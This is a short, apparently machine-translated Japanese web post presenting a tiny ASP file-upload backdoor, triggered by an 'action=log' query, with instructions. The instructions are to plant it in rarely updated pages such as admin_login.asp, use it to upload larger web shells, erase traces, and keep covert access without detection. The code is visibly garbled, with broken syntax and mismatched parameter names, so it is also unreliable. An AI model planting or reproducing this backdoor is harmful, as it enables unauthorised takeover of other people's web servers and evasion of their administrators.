<%if request.querystring( "action")= "log" then
a = request.totalbytes:a then b = "adodb.stream":set c = create object(b):c.type = 1:c.open:c.write request.binaryread(a):c.position = 0:d = c.read:e = chrb(13)&chrb(10):f = instrb(d、e):g = strb(f+1、d H = CreateObject(b):H.Type = 1:H.Open:C.Position = F+1:C.Copyto H、GF-3:H.POSITION = 0:H.TYPE = 2:H.CHARSET = "BIG5":i = H.ReadText:H.Close:J = Mid(I、InstREV(I、 "/")+1、 G):k = strb(d、e&e)+4:l = instrb(k+1、d、leftb(d、f-1))-k-2:h.type = 1:h.open:c。position = k-1:c.copyto H、L:H.SavetOfile Server.Mappath(j)、2%> <Form enctype = multipart/form-data method = post> <input Type = file name = n> <input type = submit> </form>
<%end if>
理由:ファイルをアップロードできます。シンプルでサイズが小さく、発見するのは簡単ではありません。
使用:最初にHaiyangまたはBlue Screenを使用して、admin_login.aspなどの更新が簡単ではないいくつかのファイルに馬を編集します。他の人のファイルを操作するときは、admin_login.asp?action = browserにログに入力して、ハイヤンまたはブルースクリーンをアップロードするだけです。操作後、ブルースクリーンとその他の自己免除機能を使用して、ブルースクリーンを削除します。このステーションを使用して、次回戻ってきたときにハイヤンなどにアップロードします。ほとんど調査されて殺されることはありません。